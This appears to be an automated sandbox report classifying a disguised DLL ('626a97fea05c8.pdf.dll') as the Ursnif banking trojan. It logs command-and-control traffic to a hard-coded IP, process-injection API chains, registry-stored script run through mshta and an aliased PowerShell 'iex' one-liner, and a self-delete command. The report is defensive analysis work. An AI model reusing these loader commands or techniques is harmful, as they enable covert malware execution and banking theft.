                      Source: powershell.exe, 00000012.00000003.500324132.00000182D8F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: Yara matchFile source: 4.2.rundll32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e76b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.361072798.0000000000BAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: Yara matchFile source: 4.2.rundll32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e76b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: 626a97fea05c8.pdf.dll
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF1645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF4BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EB238
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00903DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E67CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FD7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FFF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EF2A9 CreateProcessAsUserA,
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 626a97fea05c8.pdf.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 626a97fea05c8.pdf.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF6D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF84C1 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F00DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FA806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F61AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E710A GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F7950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F5312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F2331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E74AE NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EC431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F6DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FBE80 NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F0782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E10C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F3829 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FEAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F5220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E64C4 memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E36BB NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EB7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008ED77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: 626a97fea05c8.pdf.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 626a97fea05c8.pdf.dll
                      Source: 626a97fea05c8.pdf.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220428Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@24/19@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbj0ibhp.0cz.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
